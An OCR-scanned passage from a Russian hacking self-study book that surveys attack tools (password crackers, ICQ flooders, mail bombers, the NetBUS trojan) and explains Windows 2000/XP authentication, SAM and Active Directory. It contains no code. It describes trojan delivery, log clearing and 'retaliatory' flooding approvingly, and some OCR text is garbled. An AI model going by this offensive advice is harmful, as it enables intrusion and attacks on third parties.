Во-первых, войдя в систему, хакер должен выполнить то, что называется расши-рением привилегий, т.е. попытаться получить права пользователя системы с какможно более широкими правами доступа к ресурсам системы, лучше всего, ад-министратора. Один из путей решения этой задачи — взлом базы данных SAM(Security Account Manager — Диспетчер учетных записей системы защиты), хра-нящей пароли доступа к операционной системе в зашифрованном виде. Взломбазы SAM — весьма заманчивая для хакера цель, и методы ее достижения мыописываем в Главе 3 этой книги на примере знаменитой программы, ставшейклассикой взлома, LOphtCrack версии LC4 (http://www.atstake.com).

Во-вторых, хакер должен взломать защиту файлов с интересующими его дан-ными, например, почтовый ящик с текущей перепиской, кошелек Windows с но-мерами кредитных карточек, документы MS Office и так далее. Если файлы дан-ных зашифрованы, то перед хакером встает задача взлома пароля доступа.Для решения такой задачи существует множество программ, обсуждаемых вГлаве 3 этой книги. Мы описываем целый пакет программ Office Password 3.5(http://lastbit.com/download.asp) для взлома множества информационных ре-сурсов Windows — электронной почты, кошельков, архивов и других.

Другие задачи решает программа Revelation от компании SnadBoy(http://www.snadboy.com). Эта программа позволяет определить пароли, скры-

18

Page 21: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

тые за строкой «*****» в поле ввода пароля — к сожалению, новые приложенияуже не допускают такого простого взлома своих паролей, но кое-какую помощьпрограмма Revelation оказать в состоянии.

Вообще, задачи взлома доступа к шифрованной информации составляют целуюнаучную дисциплину, называемую криптоанализом, которая, в свою очередь,является целым разделом отрасли знаний, называемой криптографией. Для задачхакинга криптография представляет весьма большую важность.

Антихакеру инструменты взлома паролей также могут пригодиться — кто из насне терял пароли доступа к шифрованным файлам или провайдеру Интернета?Вдобавок, знание возможностей хакерских программ сильно помогает при на-стройке системы защиты, поскольку заставляет более ответственно подходить кзадаче выбора паролей — вы поймете, что короткий простой пароль — это зияю-щая дыра в системе защиты.

Агпзкз клиентов WeloБеспечные путешественники по виртуальным просторам Интернета — это люби-мая пожива для хакеров. Мало кто задумывается, открывая очередной Web-сайт,какие цели преследовали создатели сайта, а ведь они вполне способны изряднопотрепать нервы и опустошить кошелек доверчивого клиента очередного«бесплатного» сервиса или Интернет-магазина.

Хакер может, пользуясь некоторыми недостатками системы защиты Web-браузеров, сконструировать такую Web-страничку, что браузер доверчивогоWeb-путешественника превратится в оружие хакера, размещая и запуская безведома хозяина в памяти компьютера враждебные программы. Способы конст-руирования таких Web-страничек описаны в Главе 5 этой книги.

Другой популярной забавой хакеров можно назвать использование электроннойпочты, которая ныне все больше превращается в самый настоящий рассадниквирусов. В самом деле, открывая ленты новостей различных Web-сайтов, то идело сталкиваешься с предупреждениями и страшными историями о только чтопоявившемся вирусе.

Спамминг также можно отнести к распространенному явлению нынешнего ки-берпространства. В распоряжении хакера находятся «мейлбомберы», забрасы-вающие почтовый ящик жертвы разным мусором, и в Главе 6 описана програм-ма с устрашающим названием Death & Destruction Email Bomber — Смертельныйи Всесокрушающий мейлбомбер. Цели таких акций могут быть самыми разно-образными, в том числе самыми злонамеренными. Еще интереснее для хакера -залезть в почтовый ящик своего ближнего, а это можно сделать с помощью про-граммы взлома доступа к почтовому серверу, например, описываемой в Главе 6популярной утилиты Brutus.

19

Page 22: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Вниманием хакеров не обойдены и другие службы Интернета, например, ICQ. Чтоможет быть забавнее — выявить IP-адрес своего ICQ-собеседника и с помощьюпрограммы так называемого «флудера» (от английского слова flood — заливать)послать ICQ-собеседнику целую лавину пакетов, подвешивающих его компью-тер! Для этого существует множество программ — например, обсуждаемая в Гла-ве 7 программа ICQ Flooder, входящая в пакет программ ICQ-MultiVar, содержа-щего целый комплект весьма полезных инструментов для подобного рода про-делок в киберпространстве.

Эти инструменты одинаково пригодны и хакеру и антихакеру — например, от-слеживая IP-адрес и поведение ICQ-собеседника и имея под рукой флудер ICQ,можно достичь гораздо большего взаимопонимания обоих сторон, особенно ес-ли дать своему собеседнику возможность узнать о наличии у вас таких средств.Следует только не увлекаться и не стремиться к большему эффекту, чем это не-обходимо для обороны.

Агпзкз серверов Web

Web-серверы весьма привлекательны для хакера, поскольку эти серверы откры-ты для атак из Интернета, включая такие опасные атаки, как вторжение в корпо-ративную сеть и атаки DoS, выводящие из строя Интернет-сервисы сайта.Недостатки же защиты серверов Интернета, включая сервер IIS 5 (Internet Informa-tion Server — Информационный сервер Интернета) компании Microsoft делаютшансы на успех таких атак достаточно реальными.

Для атаки Web-серверов хакер может использовать многочисленные инструмен-ты, которые позволяют сканировать уязвимые сценарии на Web-серверах, оты-скивать в коде HTML полезные для взлома системы сведения и выполнять дру-гие действия. В Главе 8 описаны некоторые популярные инструменты этого ро-да, в частности, программа CGIScan поиска уязвимых сценариев и программаBrutus, позволяющая взломать защиту серверов IIS методом простого переборавсех паролей доступа. В Главе 9 мы описываем инструменты, применяемые длянаиболее популярных атак DoS.

Для антихакера инструменты атаки Web-серверов также представляют интерес,поскольку позволяют выполнять ответные действия против хакеров, мешающихнормальной работе Web-сервера. Например, распределенную атаку DoS можнопресечь, посылая на компьютеры-зомби пакеты, препятствующие их работе.Антихакеру следует также знать возможности инструментов хакинга Web-серверов и, например, избегать применения уязвимых CGI-сценариев. Далее, дляпроверки своих сайтов на уязвимость антихакеру очень полезно прибегнуть кинструментам, применяемым хакерами при сканировании уязвимостей сайтов.

20

Page 23: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

Сетевые сканеры

Для взлома доступа к компьютерам сети TCP/IP хакеру, прежде всего, следуетизучить ее структуру, определив подсоединенные к сети компьютеры, их ло-кальные IP-адреса, выявить открытые порты компьютеров и функционирующиена них операционные системы, службы и приложения. Для этого и существуютпрограммы сетевых сканеров, функции которых подобны инструментальнымсредствам анализа функционирования компьютерной сети.

В Главе 10 мы описываем одну из наиболее популярных хакерских утилит сканиро-вания сети — программу SuperScan, входящую в набор программ foundstone_tools(http://www.foundstone.com). Также не обойден вниманием пакет программW2RK (Windows 2000 Resource Kit — Комплект инструментов администратораWindows 2000), который настолько полюбился хакерам, что стал называтьсякомплектом W2HK (Windows 2000 Hacker Tools — Комплект инструментов хаке-ра Windows 2000).

Антихакеру средства сканирования сети полезны в том смысле, что позволяютвыяснить ее уязвимость, не дожидаясь, пока это сделает хакер.

flepex&am сетевого трафикаПрограммы перехвата сетевого трафика позволяют хакерам вытворять оченьмногие штучки, подсоединившись к сетевой кабельной системе с помощью спе-циальных приспособлений, либо просто запустив хакерскую утилиту на легаль-ном сетевом компьютере. Учитывая хаос, который чаще всего царит в локаль-ных сетях организаций с множеством никем не контролируемых компьютеров,пользователи которых имеют права на установку и запуск каких-угодно служб ипрограмм, последний вариант действий хакера представляется оптимальным.Дополнительные возможности предоставляет наличие беспроводных сетей, об-мен информацией в которых выполняется по радиоканалам. В таком случае дос-таточно за стенкой поставить свой компьютер с радиомодемом, чтобы получитьполный доступ к информации, циркулирующей в сети.

Простейшей атакой перехвата данных является снифинг — прослушивание пере-даваемой по сети информации. В состав этой информации входят пароли досту-па к общесетевым ресурсам, сообщения электронной почты, циркулирующиекак внутри сети, так и пересылаемые внешним адресатам, передаваемые по сетиинформационные файлы и прочие весьма лакомые для хакера данные. Одна изнаиболее популярных сниферов — программа SpyNet, которая позволяет выпол-нять весь набор описанных выше процедур и имеет весьма удобный графиче-ский интерфейс.

21

Page 24: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Антихакер, зная о таких методах хакинга, может предпринять свои меры защиты -шифровать передаваемые данные с помощью технологии VPN (Virtual PrivateNetwork — Виртуальные частные сети) или использовать программы, называе-мые антисниферами, которые выявляют хакерские компьютеры-перехватчикисетевых данных. Более того, сниферы, как и сетевые сканеры, представляют со-бой мощные инструменты анализа функционирования сети, и их возможностипо поиску вторжения неисчерпаемы, чем и должен пользоваться любой квали-фицированный антихакер.

Устроенные средства операционной системыМы уже говорили, как хакеры переименовали пакет утилит W2RK (инструментыобслуживания Windows 2000) в пакет W2HK — инструменты хакинга Windows 2000,поскольку утилиты из этого пакета прекрасно подходят для исследования ата-куемой системы. В операционной системе Windows имеется и другое средство -Проводник (Explorer) Windows, весьма удобный для исследования информаци-онных ресурсов хакнутой системы. Скажем, хакер может прибегнуть к поискуфайлов по определенному ключевому слову, например, password, или пароль.Как указано в [3], просто удивительно, насколько распространена порочнаяпрактика хранения паролей доступа к закрытым информационным ресурсам,типа номеров кредитных карточек, в незащищенных текстовых файлах. Так чтовзломавший компьютерную систему хакер сможет без труда получить доступ ик другим интересным ресурсам, найдя, допустим, файл с названиемpassword.txt или файл, содержащий строку пароль к провайдеру ISP.

Антихакер должен уметь прятать ценные данные от таких инструментов хакинга -делать файлы невидимыми, сохранять в шифрованных дисках, присваивать ней-тральные имена и так далее. Неплохо также научиться применять средства шиф-рования, встроенные в файловую систему NTFS компьютеров Windows 2000/XP,или предоставляемые другими криптографическими приложениями, например,PGP Desktop Security.

11рограммы~эксплойтыЭксплойты — это программы, которые используют уязвимости для вторженияв компьютер, т.е. наиболее важные для хакера инструменты. Мы уже упоми-нали про Web-сайты различных организаций, поддерживающих базы данныхуязвимостей и эксплойтов компьютерных систем (см., например, сайтhttp://www.securitylab.ru). В Главе 8 мы опишем технологию применения экс-плойтов на примере хакинга сервера IIS. Найдя с помощью сканера CGIScanуязвимый сценарий, хакер может обратиться к базе данных уязвимостей и экс-плойтов и попытаться взломать доступ к серверу. К сожалению, нынче в Интер-

22

Page 25: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

нете очень трудно найти настоящий исполняемый файл эксплойта для совре-менных приложений — в отличие от предыдущего поколения программ, напри-мер, для серверов IIS 4. В лучшем случае эксплойты в Web представлены в видеисходных программных кодов, с которыми еще нужно долго разбираться. Такчто эксплойты — это отнюдь не ключик, открывающий двери к искомому ре-сурсу, а скорее заготовка для этого ключика. Так что все в ваших руках.

Для антихакера обязательно знание всех уязвимостей и эксплойтов, угрожаю-щих его системе; более того, эти сведения должны непрерывно обновляться, по-скольку «безопасность — это процесс» (Брюс Шнайер). То, что надежно защи-щает вас сегодня, завтра будет непригодно — кто-нибудь, да найдет маленькуюдырочку в системе защиты, а уж расширить ее — это дело техники.

и трояныВирусы — это тоже инструменты атаки, которые позволяют внедрить в систему со-глядатая или просто злонамеренную программу. Особую опасность представляюттроянские кони — программы, которые внедряются в систему и позволяют хакеруудаленно управлять хакнутым компьютером. В Главе 10 мы опишем возможностистарого и заслуженного троянского коня NetBUS, который делает взломанный ком-пьютер практически рабом хакера. А установка троянов на атакуемом компьютере -не такое уж и сложное дело, как это может показаться. Для этого следует толькоразослать письма с вложением — программой троянского коня и дождаться, покаочередной «ламер» щелкнет на ссылке с заманчивым предложением, скажем, обно-вить с помощью присланного вложения свой браузер Интернета.

Для борьбы с такими инструментами хакинга существуют антивирусы и специа-лизированные программы удаления троянов. Для антихакера трояны также мо-гут пригодиться — скажем, получив от хакера письмецо с вирусной начинкой,выявите его злонамеренное содержимое антивирусом и отошлите начинку об-ратно авторам вместе с благодарностью за заботу. Или, например, вдруг кто-тоукрадет ваш компьютер — и тогда, быть может, хитро запрятанный троянскийконь может облегчить поиски вора… Помните однако, что распространение ви-русов карается по закону, и автор ни в коем случае не одобряет таких действий.

ЗаключениеВ этой главе мы попытались облегчить читателям работу с книгой — по крайнеймере, теперь вам стала ясна ее структура, и понятно, что следует прочитать, чтобынаучиться выполнять определенную атаку. И в самом деле, зачем знакомиться ссетевыми атаками, если можно залезть через форточку в комнату с компьютером(автор не советует), извлечь жесткий диск, быстро убежать и познакомиться с нимв спокойной обстановке? Или, к примеру, стоит ли пытаться залезть через Интер-

23

Page 26: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

нет на сервер организации, политика безопасности которой сводится к листочкамсо списками паролей, приклеенным скотчем к мониторам компьютеров?

В самом деле, почитайте содержимое хакерских сайтов Интернета — и что же?Оказывается, можно просто залезть в мусорный ящик организации, использую-щей компьютерные технологии (а кто их не использует), чтобы добыть целыймешок дискет, документов, всяких бумажек, содержащих практически все — отпаролей доступа к компьютерной сети до самых конфиденциальных данных.Но в этой книге мы ограничимся хакерскими технологиями, не связанными стакими экзотическими методами.

Инструменты хакинга весьма разнообразны и выбор наиболее эффективных изних зависит от опыта и возможностей хакера. Причем, если вас интересуетименно информация, а не всякие интересные штучки, свойственные личностямнаподобие доктора Добрянского, следует избирать наиболее оптимальную так-тику вторжений. Антихакеру же следует уделить самое пристальное вниманиевсем технологиям хакинга, чтобы не стать субъектом, которого «кул хацкеры»в просторечии называют «ламером».

А теперь приступим к изучению самих инструментов хакинга, которые позво-ляют выполнять все эти удивительные вещи, про которые мы часто читаем впрессе и видим на экранах телевизоров, иногда видим пользователей этих инст-рументов в сопровождении джентльменов в фуражках и комментариев на тему«вот что бывает, если не слушаться старших…». Поэтому, чтобы избежать мно-гих неприятностей в дальнейшем, начнем с изучения своего противника — сис-темы защиты компьютеров Windows 2000/XP.

24

Page 27: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 2 .

Защита Windows «ЮО/XfОперационные системы семейства Windows 2000 с самого начала разрабатыва-лись с учетом требований документа TCSEC (Trusted Computer System EvaluationCriteria — Критерии оценки надежной системы) министерства обороны США.Для обеспечения безопасности компьютерных систем, созданных на базеWindows 2000, в нее включены средства защиты, поддерживающие три основ-ных компонента.

• Аутентификация.

• Авторизация.

• Аудит.

Рассмотрим эти компоненты системы защиты по очереди.

АутентификацияАутентификацией называется обеспечение возможности для доказательства од-ного объекта или субъекта своей идентичности другому объекту или субъекту.Говоря понятнее, аутентификация — это процедура, подобная установлениювашей личности, когда вы получаете деньги в сберкассе, покупаете билет насамолет, регистрируетесь при входе в компьютер и так далее, т.е. доказываете,что вы — это вы.

Один из способов аутентификации в компьютерной системе состоит во вводевашего пользовательского идентификатора, в просторечии называемого «логи-ном» (от английского «log in» — регистрационное имя), и пароля — некой конфи-денциальной информации, знание которой обеспечивает владение определен-ным ресурсом. Получив введенный пользователем логин и пароль, компьютерсравнивает их со значением, которое хранится в специальной базе данных и,в случае совпадения, пропускает пользователя в систему.

В компьютерах Windows NT/2000/XP такая база данных называется SAM (SecurityAccount Manager — Диспетчер защиты учетных записей). База SAM хранит учетныезаписи пользователей, включающие в себя все данные, необходимые системе защи-ты для функционирования. Поэтому взлом базы SAM — одна из самых увлекатель-ных и плодотворных задач хакинга, которую мы описываем в Главе 3 этой книги.

Стоит отметить, что текстовый ввод логина и пароля вовсе не является единст-венным методом аутентификации. Ныне все большую популярность набираетаутентификация с помощью электронных сертификатов, пластиковых карт ибиометрических устройств, например, сканеров радужной оболочки глаза.Также не следует забывать, что процедуру аутентификации применяют компью-

Page 28: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

теры при общении друг с другом, используя при этом весьма сложные крипто-графические протоколы, обеспечивающие защиту линий связи от прослушива-ния. А поскольку, как правило, аутентификация необходима обоим объектам,т.е., например, обоим компьютерам, устанавливающим сетевое взаимодействие,то аутентификация должна быть взаимной. Иначе, к примеру, покупая товар в неаутентифицированном Интернет-магазине, вы рискуете потерять (и, как следуетиз новостей на эту тему, очень даже с большой вероятностью) свои денежки,которых, как известно, всегда мало.

В любом случае, для аутентификации в компьютерных системах используются оп-ределенные алгоритмы, или, как чаще говорят, протоколы. Сетевые компьютерыWindows NT 4 для аутентификации друг друга использовали протокол NTLM(NT LAN Manager — Диспетчер локальной сети NT). Далее NTLM вошел в составсетевых средств компьютеров Windows 2000/XP. Протокол NTLM, как и его пред-шественник, протокол LM (LAN Manager — Диспетчер локальной сети), настолькохорошо освоен хакерами, что один из способов взлома сетей Windows как раз и со-стоит в принуждении компьютеров сети аутентифицироваться с помощью NTLM.

В сетях Windows 2000/XP для аутентификации применяется гораздо более со-вершенный протокол Kerberos, обеспечивающий передачу между компьютера-ми данных, необходимых для взаимной аутентификации, в зашифрованномвиде. Так что если вы когда-либо регистрировались на компьютере как пользо-ватель домена Windows 2000/XP, то знайте — вы аутентифицируетесь на сервереWindows 2000 по протоколу Kerberos.

Из всего вышесказанного хакер может сделать вывод — все, что ему нужно дляаутентификации в компьютерной системе Windows 2000/XP — это логин и осо-бенно пароль пользователя. Антихакер, естественно, должен хранить пароль вполной тайне, поскольку с точки зрения компьютера тот, кто знает ваш логин ипароль — это вы и никто другой.

АвторизацияПосле аутентификации пользователя, пытающегося получить доступ к инфор-мационным ресурсам, компьютерная система должна проверить, к каким имен-но ресурсам этот пользователь имеет право обращаться. Данную задачу решаетследующий компонент системы защиты — средства авторизации. Для авториза-ции пользователей в системах Windows каждому пользователю каждого инфор-мационного ресурса, например, файла или папки, определяется набор разреше-ний доступа. Например, пользователю Васе Пупкину можно разрешить толькочтение важного файла, а Пете Лохову можно разрешить и его модификацию.Авторизацию не следует путать с аутентификацией, поскольку, например, иВася Пупкин, и Петя Лохов оба могут пройти входную аутентификацию, но ихвозможности по нанесению системе ущерба могут существенно отличаться.

26

Page 29: Самоучитель хакера подробное иилюстрированное руководство

Защита Windows 2000/XP

Чтобы облегчить авторизацию пользователей, в системах Windows NT/2000/XPразработан набор средств для управления доступом к ресурсам. Эти средстваопираются на концепцию групп пользователей, и суть ее такова. Вместо того,чтобы для каждого отдельного пользователя устанавливать множество разреше-ний на доступ к различным ресурсам, эту задачу решают всего один раз для це-лой группы пользователей. Далее каждый новый пользователь включается в од-ну из существующих групп и получает те же права, или привилегии на доступ,которые определены для остальных членов группы. Например, Васю Пупкинаможно включить в группу Гость (Guest), члены которой практически не имеютникаких прав, а Петю Лохова — в группу Пользователь (User), члены котороймогут открывать и редактировать отдельные документы.

Теперь вам, должно быть, становится ясным, почему следующей задачей хакерапосле входной регистрации в системе является расширение привилегий. Без по-лучения прав высокопривилегированной группы, лучше всего группы Админи-страторы (Administrators), ничего у хакера не выйдет, и останется ему толькоодно — «заклеить кулер скотчем» или выключить компьютер при работающемвинчестере, чем и занимаются некоторые странные личности, обитающие в на-шем непростом мире…

urnЯсно, что включенный в гостевую группу Вася Пупкин будет обижен такимпренебрежением к своей персоне и захочет залезть туда, куда его не пускают.И вот, чтобы предотвратить его попытки несанкционированного доступа к чу-жим ресурсам, в системе устанавливают аудит — средства наблюдения за собы-тиями безопасности, т.е. специальная программа начинает отслеживать и фик-сировать в журнале события, представляющие потенциальную угрозу вторженияв систему. В число событий безопасности входят попытки открытия файлов,входной регистрации в системе, запуска приложений и другие. Так что, если всистеме с установленным аудитом Вася Пупкин попробует открыть файл, неимея на то разрешений, это событие будет зафиксировано в журнале безопасно-сти, вместе с указанием времени и учетной записи пользователя, вызвавшеготакое событие.

Просматривая журнал безопасности Windows NT/2000/XP, можно определитьочень многое, что позволит идентифицировать хакера, так что одна из важней-ших задач хакинга — это очистка журнала безопасности перед уходом. Как этоделается, мы отдельно поговорим в Главе 4, а сейчас сформулируем, что долженсделать антихакер, чтобы предотвратить все попытки вторжения в систему.Хорошо организованная защита требует создания политики безопасности, подкоторой понимается документ, фиксирующий все правила, параметры, алгоритмы,

27

Page 30: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

процедуры, организационные меры, применяемые организацией для обеспече-ния компьютерной безопасности.

Например, политика безопасности может включать требование задавать паролидлиной не менее 11 символов, или обязательный запуск парольной заставки пе-ред кратковременной отлучкой от компьютера, и так далее. Все эти вопросыдостаточно подробно рассмотрены во множестве книг, например, [2], [6], так чтоне будем повторяться, а перейдем к более существенным для нас темам — какработает эта система защиты Windows 2000/XP, и что можно сделать, чтобы онане работала.

Как работает зашита Windows 2OOO/XPРаботу всей системы защиты Windows 2000/XP обеспечивает служба SRM(Security Reference Monitor — Монитор защиты обращений). Монитор SRM рабо-тает в режиме ядра системы Windows 2000/XP, т.е. невидимо для пользователя.Однако в системе Windows 2000/XP есть программы, в том числе поддерживаю-щие графический интерфейс, которые позволяют обратиться к различным ком-понентам монитора SRM. Эти компоненты таковы.

• Диспетчер LSA (Local Security Authority — Локальные средства защиты), про-веряющий, имеет ли пользователь разрешения на доступ к системе согласнополитике безопасности, хранимой в специальной базе данных LSA. Инымисловами, диспетчер LSA авторизует пользователей системы согласно приня-той политике безопасности. Помимо этого, диспетчер LSA управляет поли-тикой защиты системы и аудитом, а также ведет журнал безопасности.

• Диспетчер SAM (Security Account Manager — Диспетчер учетных записей сис-темы защиты), который поддерживает работу с учетными записями локаль-ных пользователей и групп. Эти учетные записи необходимы для аутентифи-кации пользователей, которые далее авторизуются диспетчером LSA.

• Служба AD (Active Directory — Активный каталог), которая поддерживает базуданных AD с учетными записями пользователей и групп домена. Эти учетныезаписи необходимы для аутентификации пользователей, далее авторизуемыхдиспетчером LSA.

• Процедура регистрации, которая получает от пользователя введенный логини пароль, после чего выполняет проверку двоякого рода: если при входнойрегистрации был указан домен, то контроллеру домена посылается запрос,причем для связи компьютеров используется протокол Kerberos; если же ука-зан локальный компьютер, то проверку выполняет локальный компьютер.

Вам, наверное, уже стало понятным, как все это работает: процедура регистрациив диалоге, генерируемом при включении компьютера, предлагает пользователю

28

Page 31: Самоучитель хакера подробное иилюстрированное руководство

Защита Windows 2000/XP

ввести свой логин, пароль и указать компьютер/домен, в который он хочет войти.Далее серверы SAM и AD выполняют аутентификацию пользователя, а серверLSA выполняет авторизацию пользователя. Если все прошло нормально, то поль-зователь входит в систему, и все его действия, т.е. обращения к информационнымресурсам, контролируются службой SRM.

Это, конечно, чрезвычайно упрощенная модель работы системы защитыWindows 2000/XP. Однако приведенных данных достаточно, чтобы выявить двеосновные уязвимости системы защиты. Во-первых, это наличие баз данных спаролями пользователей (SAM и AD); во-вторых, это наличие обмена информа-цией между компьютерами при регистрации пользователя в домене. Посмотрим,что это нам дает.

SAMПонятно, что лучше всего искать то, что тебе надо, в местах, которые для этогоотведены по определению. Так что самое лучшее, что может сделать хакер, по-пав в компьютер, это попробовать взломать доступ к базам SAM и AD, что сразуобеспечит его паролями доступа ко всем ресурсам компьютера. База SAM хра-нится в виде файла в каталоге %корневой„каталог%\зу51ет32\сопЛд\5ат, а базаAD — в каталоге %KopHeBoft_KaTanor%\ntds\ntds.dit. Так что, чего, казалось бы,проще — открыть эти базы данных и прочитать содержимое! Не тут то было.

В стародавние времена, когда любителей чужих секретов было не так много иони не были такие умные, это и в самом деле было несложно сделать, вернее, нетак сложно, как в системах Windows 2000/XP. Для защиты паролей в базе SAM всистеме Windows NT 4 использовалось слабенькое шифрование паролей, обеспе-чиваемое протоколом сетевой идентификации NTLM и, к тому же, для обратнойсовместимости были оставлены пароли, зашифрованные согласно протоколусетевой идентификации LM, который использовался в предыдущих версияWindows. Шифрование LM было настолько слабо, что пароли в SAM взламыва-лись хакерскими утилитами, например, популярнейшей утилитой LOphtCrack(http://www.atstacke.com) без всяких затруднений, методом прямого переборавсех возможных вариантов.

Недостатком первых версий утилиты LOphtCrack было отсутствие инструмента из-влечения шифрованных паролей из базы SAM, но с этой задачей успешно справля-лась не менее известная программа, запускаемая из командной строки, pwdump(http://www.atstacke.com). Так что в деле хакинга Windows царила полная гармо-ния — программа pwdump извлекала из базы SAM шифрованные пароли учетныхзаписей и заносила их в файл, далее этот файл читала программа LOphtCrack, ипутем некоторых усилий — очень небольших, учитывая недостатки протоколаLM — расшифровывала добытые пароли.

29

Page 32: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Однако все изменилось с появлением Service Pack 3 для Windows NT 4, в кото-ром было реализовано средство, называемое Syskey и представляющее собойинструмент для стойкого (надежного) шифрования паролей, хранимых в SAM.При желании пользователь Windows NT 4 мог включить средство Syskey само-стоятельно; в системах же Windows 2000/XP шифрование Syskey устанавливает-ся автоматически. В отличие от шифрования LM и NTLM шифрование Syskeyне позволяет выполнять взлом паролей простым перебором, поскольку при ис-пользовании паролей достаточной длины это потребует неприемлемых затратвычислительных ресурсов. Поэтому единственное, на что осталось надеятьсяхакеру — это рассчитывать на недостатки политики безопасности, допускающиеприменение пользователями паролей длиной 3-4 символа, а то и вовсе использо-вание в качестве паролей слов из английского языка. Вспомните, мы приводилив Главе 1 пример недавнего взлома базы данных Microsoft, шифрованной паро-лем длиной четыре символа — и это в Microsoft!

Так что хакерам пришлось поднапрячься и придумать более изощренные мето-ды взлома системы защиты Windows. Чтобы разобраться в этих методах, давайтерассмотрим более подробно, как работает эта защита.

Объекты системы зашитыКак же система Windows 2000/XP управляет всеми этими участниками процессааутентификации, авторизации, аудита, в который вовлечены пользователи, компь-ютеры, группы пользователей с различными правами доступа к информационнымресурсам? А вот как.

Каждый пользователь, компьютер, учетная запись или группа считаются объек-том системы защиты Windows, и каждому такому объекту при его созданииприсваивается так называемый идентификатор системы защиты SID (SecurityIDentifier), представляющий собой 48-разрядное число, уникальное для всейкомпьютерной системы. Каждому компьютеру после установки системы Win-dows 2000/XP присваивается случайно выбранное значение SID, и каждому до-мену Windows 2000 после инсталляции также присваивается случайно выбран-ное уникальное значение SID.

Все объекты системы защиты имеют определенные привилегии доступа к ин-формационным ресурсам. А как же владельцы ресурсов определяют, какомуобъекту разрешен доступ к данному конкретному ресурсу, и какой именно дос-туп? С этой целью для каждого информационного ресурса (файла, папки и т.д.) всистеме Windows задается список ACL (Access Control List — Список управлениядоступом), который содержит записи АСЕ (Access Control Entries — Записиуправления доступом). Записи АСЕ содержат идентификаторы SID объектовсистемы защиты и их права доступа к данному ресурсу. Списки ACL создаютсясамими владельцами информационных ресурсов с помощью средств операционной

30

Page 33: Самоучитель хакера подробное иилюстрированное руководство

Защита Windows 2000/XP

системы, например, Проводника (Explorer) Windows, и работа с этими средствамиописана в любом руководстве по операционным системам Windows 2000/XP.

Вот как происходит работа со списками ACL. После регистрации в компьютереWindows 2000/XP каждый объект (например, пользователь) получает от диспет-чера LSA маркер доступа, содержащий идентификатор SID самого пользовате-ля и набор идентификаторов 8Ш всех групп, в которые пользователь входит.Далее, когда вошедший в систему пользователь обращается к ресурсу, службаSRM сравнивает его маркер доступа с идентификаторами 8Ш в списке ACL ре-сурса, и если пользователь имеет право на доступ к ресурсу, то он его получает.

Как видим, все очень «просто», хотя на самом деле наше описание — это вер-хушка айсберга. Мы однако не будем углубляться в изучение системы защиты,поскольку все, что нам нужно — это понять, как можно сломать всю эту конст-рукцию. Путей для этого множество, и их поиском и обустройством для всеоб-щего блага занято множество весьма квалифицированных людей. Один из самыхнапрашивающихся и элегантных способов — это очистка списков ACL всех объ-ектов, после чего система Windows 2000/XP открывается для любых манипуля-ций. И такие проекты имеются, находясь в стадии активной разработки (напри-мер, проект программы МТКар на сайте http://www.rootkit.com). Однако эффек-тивность таких утилит умаляется тем обстоятельством, что доступ к спискамACL сам по себе требует административных привилегий!

Раз все так не просто при локальном доступе к компьютеру, то чего можно ожи-дать от каких-либо путей вторжения, связанных с процессом сетевой идентифи-кации пользователя домена? Ведь при этом по сети передается множество кон-фиденциальной информации, включая пароли. Обсудим эту задачу, но вначалерассмотрим, из чего состоит сеть компьютеров Windows 2000/XP.

Активный каталогЕСЛИ основой построения сети компьютеров Windows NT 4 были домены, т.е.группы компьютеров под управлением контроллера, то сети Windows 2000/XPструктурируются и управляются с помощью служб активного каталога ADS(Active Directory Services). Службы ADS устанавливаются и управляются сред-ствами серверов Windows 2000, и выполняемые при этом процедуры описаны вруководствах по использованию систем Windows 2000 Server. Мы не будем по-вторять их содержимое, а просто постараемся указать, что интересного можетнайти хакер во всех этих активных каталогах.

Все компоненты компьютерной сети — компьютеры, пользователи, ресурсы,службы, учетные записи — для службы ADS являются объектами, свойства ко-торых определяются с помощью атрибутов, т.е. параметров различного назна-чения. Например, объект учетная запись имеет атрибут имя пользователя, аобъекты компьютер имеют атрибут IP-адрес компьютера в локальной сети.

31

Page 34: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Для удобства управления этими объектами в ADS используются объекты, назы-ваемые контейнерами, задача которых — хранить в себе остальные объекты, втом числе контейнерные. К контейнерным объектам относятся организационныеединицы OU (Organization Units), которые могут включать в себя пользователей,группы, компьютеры, принтеры, приложения, политики системы защиты, общиефайлы и папки, плюс другие OU. Назначение OU — упростить администрирова-ние компьютерной сети путем разделения ее на части с разными характеристи-ками, т.е. можно поместить в отдельные OU различные компьютеры и пользова-телей, после чего настроить работу этих OU с учетом содержимого.

Для организации сети компьютеров Windows 2000/XP они могут объединяться влогические единицы, называемые доменами. Каждый домен управляется кон-троллерами домена, хранящими общую для домена информацию и выполняющи-ми централизованную авторизацию подсоединяющихся пользователей. В доменеWindows 2000 контроллеров может быть несколько, и все они — равноправны, чтоотличает домен Windows 2000 от домена Windows NT. Таким образом, компьюте-ры одного домена совместно используют единую базу учетных записей, и вошед-ший в домен пользователь имеет доступ ко всем общим ресурсам домена.

Для структурирования компьютерной сети домены Windows 2000/XP могут бытьобъединены в деревья, а деревья могут быть объединены в лес. Таким образом,вся сеть организации может состоять из доменов отделов, и при этом каждыйдомен будет иметь собственное имя и контроллер. Между всеми доменами де-ревьев и лесов организуются двусторонние доверительные отношения, т.е. вхо-дящие в один домен компьютеры могут получать доступ к компьютеру из дру-гого домена в лесу или дереве.

Преимущество использования такой модели состоит в возможности структури-рования имен сетевых компьютеров, которые должны соответствовать их поло-жению в лесу доменов. Допустим, у нас имеется домен с именем domen. Тогдакомпьютеры домена именуются так: com*!.domen, comp2.domen… А теперьдопустим, что в сети имеется множество доменов, и каждый домен имеет своеимя, допустим, domenl, domen2,… Чтобы организовать дерево доменов, созда-ется несколько ветвей, и к имени каждого домена в ветви слева приписываетсяимя смежного с ним домена в направлении от корня дерева.

